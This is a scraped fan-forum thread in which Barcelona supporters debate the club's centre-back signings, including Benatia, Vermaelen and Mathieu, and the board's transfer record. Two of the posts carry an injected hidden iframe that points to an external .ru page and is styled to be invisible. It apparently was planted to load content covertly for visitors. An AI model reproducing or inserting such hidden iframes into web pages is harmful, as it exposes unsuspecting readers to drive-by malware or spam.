Mehdi Benatia

spark

why is benatia being treated like he will instantly make us champions league winners? if you know football you know our problem defensively was positioning and pressing, and the fact we needed a guy who is better in the air. we went ahead and bought two centre backs that are barca profile, quick and good in the air. its down to lucho to take care of everything else.

our other problem was buses which should be solved with rakitic and suarez. so there you go.

The old elusive Barca profile which these days means which ever player Barca buy.

Hamzah

High Definition Member
The old elusive Barca profile which these days means which ever player Barca buy.

not every player, i can name several who we bought who didn't fit. but those two fit the bill. i'm not really convinced with verm's quality but he is just there as a backup so it's not serious. he will fit in like a glove in the system though, and he IS capable of good performances, so if he does well in training lucho will give him a shot.

we now have four natural cb's who all fit the system and the quality is good enough that provided the pressing and shape is sorted by lucho our defense will be good enough this season.

SeloBarca

I'm pretty sure you were one of the ones that claimed the biting incident will not affect his fee.

Vermaelem for 10M was not overpaid.

Nop, i even wanted him to get punished. Hoever i said theres many more that have done worse, like Pepe.

10M + Bonuses. Still overpaid for a player thats injured most of the time and turns 29 this year.

F

Flavia

I think you know that Sandro was the one who pulled Ronaldinho deal when he was vice president under Laporta. He used his brazilian connection to buy Ronaldinho as he did for :neymar:. Btw i am defending Sandro, they are both corrupt as hell but you are defending Laporta who if he had managed Barca for a few more years as president then i am 100 % sure that Messi would been sold to cover the debt amount as we were a sinking ship in terms of economics.

Messi was almost sold this summer to fund the new stadium. And that possibility for next summer is still real. And I wasn't even advocating for laporta to have more years. Just pointing out he had a more capable board of directors. Txiki build 2 CL winning teams, and look what he's doing to Man City. Zubi failed to sign a cb for years. We watched Messi, Iniesta, Xavi be wasted, as the team wasn't properly reinforced for years. This season they made an effort, and improved the team, but because we won nothing last season. I'm not sure we'd be seeing so many signings had la lliga be won. Tata would've probably stayed as well.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Hamzah

High Definition Member
also, the defense wasn't even the major problem last season. (in addition to the shit atmosphere in the team) it was our inability to break buses and the fact we had no pressing and shape when we lost the ball to counters.

look how the mighty bayern who everyone here can't get enough of did against madrid, when they tried to play in a similar way to ourselves. they had the same problems we did.

L

linetty

Nop, i even wanted him to get punished. Hoever i said theres many more that have done worse, like Pepe.

10M + Bonuses. Still overpaid for a player thats injured most of the time and turns 29 this year.
Bonuses depending on performances and CLs won. If he fails, it will not matter because it's only 10M. If he performs well, you won't care about that 5M. And you won't care even more if we win the CL.

Hamzah

High Definition Member

in today's market its a good price. 29 isn't even old...

I

instinct

Messi was almost sold this summer to fund the new stadium. And that possibility for next summer is still real.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

qzKcdN2.gif

spark

Just whining, thats our hobby. As Barca fans we should never stop whining #BOARD OUT #LITTLE DICTATOR MESSI OUT #BRAZILIAN BOY TOY NEYMAR OUT # CAMP NOU BLACK CAT OUT.

Maybe the whiners are boring but so is the Barca Defense Task-force™ which appear swiftly to defend any and all decisions Barca make, contorting themselves in all kind of positions to create new narratives of why even Arteta is a valid player if Barca was to announce his signing today.

Hamzah

High Definition Member
Maybe the whiners are boring but so is the Barca Defense Task-force™ which appear swiftly to defend any and all decisions Barca make, contorting themselves in all kind of positions to create new narratives of why even Arteta is a valid player if Barca was to announce his signing today.

i don't agree man. i honestly think all of our transfers have been good so far. my only problem is that we still have the clowns alves and song and didn't get a proper right back (douglas is not my idea of a good right back).

F

Frejsgodes

It's very simple. Benatia doesn't fit out defense and what the coaches want in a CB at Barca. That's the reason we didn't go for Benatia. Mathieu and Vermaelen are better fits than Benatia.

SeloBarca

True that.

It's very simple. Benatia doesn't fit out defense and what the coaches want in a CB at Barca. That's the reason we didn't go for Benatia. Mathieu and Vermaelen are better fits than Benatia.

In what way? Benatias qualities is very similiar to Puyols.

JamDav1982

Messi was almost sold this summer to fund the new stadium. And that possibility for next summer is still real. And I wasn't even advocating for laporta to have more years. Just pointing out he had a more capable board of directors. Txiki build 2 CL winning teams, and look what he's doing to Man City. Zubi failed to sign a cb for years. We watched Messi, Iniesta, Xavi be wasted, as the team wasn't properly reinforced for years. This season they made an effort, and improved the team, but because we won nothing last season. I'm not sure we'd be seeing so many signings had la lliga be won. Tata would've probably stayed as well.

No chance was Messi ever getting sold to fund the stadium and it was never remotely close to happening.

Txiki has wasted a lot of money at Man City and the majority of players in their first team now were there before he arrived. His answer to Man Citys CB problem last season... Demichelis. This season it has been 43m for Mangala!

As for wasting players peak years Barcelona hit a lower level at the end of the Rijkaard era than they have hit in the last few seasons. Players at their peak like Deco and Ronaldinho were totally out of control and wasting their peak years.

To sign the best players from around the world is much tougher now than it was from 2004-2010 and in general the standard of other teams is much higher than then also.

Home of Barca Fans